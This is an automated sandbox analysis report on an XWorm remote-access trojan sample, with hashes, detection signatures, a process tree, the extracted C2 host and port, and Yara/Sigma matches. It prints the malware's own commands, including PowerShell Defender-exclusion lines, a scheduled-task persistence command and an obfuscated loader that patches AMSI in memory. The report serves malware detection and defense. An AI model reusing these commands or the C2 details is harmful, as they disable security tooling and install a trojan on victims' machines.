
Windows Analysis Report
mIURiU8n2P.exe

Overview

General Information

Sample name: mIURiU8n2P.exe (renamed because the original name is a hash value)
Original sample name: bd00a7577088b67b52699f956275a3f563d623ca907feeeaee8d2f821d35de40.exe
Analysis ID: 1532627
MD5: e1c82191b678cea8f3c996887ddc1232
SHA1: 7946006ca278892817b7a778eea1e04f5b2f948c
SHA256: bd00a7577088b67b52699f956275a3f563d623ca907feeeaee8d2f821d35de40
Tags: exe, user-Chainskilabs

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains process injector
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Contains functionality to log keystrokes (.Net Source)
Creates a thread in another existing process (thread injection)
Creates multiple autostart registry keys
Drops PE files to the user root directory
Found suspicious powershell code related to unpacking or dynamic code loading
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • mIURiU8n2P.exe (PID: 2076 cmdline: "C:\Users\user\Desktop\mIURiU8n2P.exe" MD5: E1C82191B678CEA8F3C996887DDC1232)
    • DeadXClient.exe (PID: 5324 cmdline: "C:\Users\Public\DeadXClient.exe" MD5: F1976EA02BFFAEF5AC943C2ABBB7426C)
      • schtasks.exe (PID: 7244 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • DeadROOTkit.exe (PID: 5804 cmdline: "C:\Users\Public\DeadROOTkit.exe" MD5: 7DD98FC2976EE270A278E1A9A28EEFAE)
      • powershell.exe (PID: 7176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7868 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DeadROOTkit.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Deadsvchost.exe (PID: 8132 cmdline: "C:\Users\Public\Deadsvchost.exe" MD5: F1976EA02BFFAEF5AC943C2ABBB7426C)
    • DeadCodeRootKit.exe (PID: 3444 cmdline: "C:\Users\Public\DeadCodeRootKit.exe" MD5: B8479A23C22CF6FC456E197939284069)
  • powershell.exe (PID: 5480 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bubCglTffNzZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QBDRAqnALMmwja,[Parameter(Position=1)][Type]$duQqlSyxSK)$pNdjVVbnfJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pNdjVVbnfJT.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QBDRAqnALMmwja).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$pNdjVVbnfJT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+
'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+'',$duQqlSyxSK,$QBDRAqnALMmwja).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $pNdjVVbnfJT.CreateType();}$RJkdRlkUxkpOh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+'f'+'t.W'+[Char](105)+'n'+[Char](51)+'2.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+'f'+[Char](101)+'N'+'a'+''+[Char](116)+'iv'+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$zjaDRBJuPBhArz=$RJkdRlkUxkpOh.GetMethod('G'+'e'+''+'t'+'P'+[Char](114)+''+'o'+''+'c'+''+[Char](65)+''+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+'t'+''+[Char](97)+'t'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SsrFUvzfWALaJuFfDwp=bubCglTffNzZ @([String])([IntPtr]);$tNZWRoZhdGxbOGCpZBOKKk=bubCglTffNzZ 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kXUOjVwsnVT=$RJkdRlkUxkpOh.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](77)+'o'+'d'+''+'u'+'l'+[Char](101)+''+'H'+'a'+'n'+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'rn'+'e'+''+[Char](108)+'3'+[Char](50)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$LadMSRasXMAaNc=$zjaDRBJuPBhArz.Invoke($Null,@([Object]$kXUOjVwsnVT,[Object](''+[Char](76)+'oa'+'d'+'L'+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$SNikSVGRGIadTTQBM=$zjaDRBJuPBhArz.Invoke($Null,@([Object]$kXUOjVwsnVT,[Object]('V'+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+'c'+''+[Char](116)+'')));$HSvqCok=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LadMSRasXMAaNc,$SsrFUvzfWALaJuFfDwp).Invoke(''+'a'+''+[Char](109)+''+'s'+'i.'+[Char](100)+'ll');$BNdTdCEoXMsXuDwEG=$zjaDRBJuPBhArz.Invoke($Null,@([Object]$HSvqCok,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+'f'+[Char](101)+'r')));$DTvdUDKKbk=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SNikSVGRGIadTTQBM,$tNZWRoZhdGxbOGCpZBOKKk).Invoke($BNdTdCEoXMsXuDwEG,[uint32]8,4,[ref]$DTvdUDKKbk);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BNdTdCEoXMsXuDwEG,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SNikSVGRGIadTTQBM,$tNZWRoZhdGxbOGCpZBOKKk).Invoke($BNdTdCEoXMsXuDwEG,[uint32]8,0x20,[ref]$DTvdUDKKbk);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](68)+'e'+'a'+''+'d'+''+[Char](115)+''+'t'+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 6968 cmdline: C:\Windows\System32\dllhost.exe /Processid:{7d42e50e-8059-4906-9d19-fa399c842f66} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1084 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1252 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1296 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1408 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1488 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1552 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1572 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1652 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1724 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1824 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1840 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1940 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1948 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1956 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2036 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • spoolsv.exe (PID: 1932 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
  • Deadsvchost.exe (PID: 7452 cmdline: C:\Users\Public\Deadsvchost.exe MD5: F1976EA02BFFAEF5AC943C2ABBB7426C)
  • Deadsvchost.exe (PID: 7700 cmdline: "C:\Users\Public\Deadsvchost.exe" MD5: F1976EA02BFFAEF5AC943C2ABBB7426C)
  • cleanup
{"C2 url": ["subscribe-bond.gl.at.ply.gg"], "Port": "28600", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_XWorm_1 | Yara detected XWorm | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\Public\DeadXClient.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\Users\Public\DeadXClient.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | see below
  • 0x7532:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x75cf:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x76e4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x736e:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\DeadROOTkit.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\Users\user\AppData\Local\DeadROOTkit.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Local\DeadROOTkit.exe | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
Source | Rule | Description | Author | Strings
00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | see below
  • 0x7332:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x73cf:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x74e4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x716e:$cnc4: POST / HTTP/1.1
00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | see below
  • 0x2642a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x264c7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x265dc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x26266:$cnc4: POST / HTTP/1.1
00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
Source | Rule | Description | Author | Strings
2.0.DeadROOTkit.exe.1a0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
2.0.DeadROOTkit.exe.1a0000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
2.0.DeadROOTkit.exe.1a0000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
2.0.DeadROOTkit.exe.1a0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | see below
  • 0x888a:$s6: VirtualBox
  • 0x87e8:$s8: Win32_ComputerSystem
  • 0x91f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x9293:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x93a8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8d52:$cnc4: POST / HTTP/1.1
0.2.mIURiU8n2P.exe.27c5330.2.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Users\Public\DeadXClient.exe" , CommandLine: "C:\Users\Public\DeadXClient.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\DeadXClient.exe, NewProcessName: C:\Users\Public\DeadXClient.exe, OriginalFileName: C:\Users\Public\DeadXClient.exe, ParentCommandLine: "C:\Users\user\Desktop\mIURiU8n2P.exe", ParentImage: C:\Users\user\Desktop\mIURiU8n2P.exe, ParentProcessId: 2076, ParentProcessName: mIURiU8n2P.exe, ProcessCommandLine: "C:\Users\Public\DeadXClient.exe" , ProcessId: 5324, ProcessName: DeadXClient.exe
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Deadsvchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\Public\DeadXClient.exe, ProcessId: 5324, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Deadsvchost
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\DeadROOTkit.exe" , ParentImage: C:\Users\Public\DeadROOTkit.exe, ParentProcessId: 5804, ParentProcessName: DeadROOTkit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', ProcessId: 7176, ProcessName: powershell.exe
                          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bubCglTffNzZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QBDRAqnALMmwja,[Parameter(Position=1)][Type]$duQqlSyxSK)$pNdjVVbnfJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pNdjVVbnfJT.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QBDRAqnALMmwja).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$pNdjVVbnfJT.D
